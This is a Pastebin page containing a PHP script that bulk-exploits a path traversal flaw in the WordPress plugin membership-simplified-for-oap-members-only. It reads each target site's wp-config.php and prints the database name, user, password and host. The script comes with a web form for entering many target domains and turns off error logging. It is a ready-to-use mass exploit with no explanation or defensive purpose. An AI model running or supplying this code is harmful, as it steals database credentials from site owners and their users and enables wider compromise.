Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- /*
- Name app : Wordpress Pligin membership-simplified-for-oap-members-only Auto Get DataBase (AFD)
- Author / Editor Script : AZZATSSINS CYBERSERKERS
- */
- echo"<title>WordPress Get Database | membership-simplified-for-oap-members-only</title><center>
- <body bgcolor=silver><u><i><b><h1>© AZZATSSINS CYBERSERKERS</h1>
- </b></i></u><br>
- <form method='post'>
- Domain: <br>
- <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 50px;'></textarea><br>
- <input type='submit' name='hajar' value='GET DB!'>
- </form>";
- $sites = explode("\r\n", $_POST['url']);
- if($_POST['hajar']) {
- foreach($sites as $site) {
- echo "<br><u><b>Target : ".$site."</b></u><br>";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././wp-config.php");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- $xp = curl_exec ($ch);
- curl_close($ch);
- if(preg_match("#DB_USER#i",$xp)){
- preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}<br>";
- preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}<br>";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
- preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}<br>";
- } else { echo "<center><font color=red>Not Vuln</font><br><hr><br>"; }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement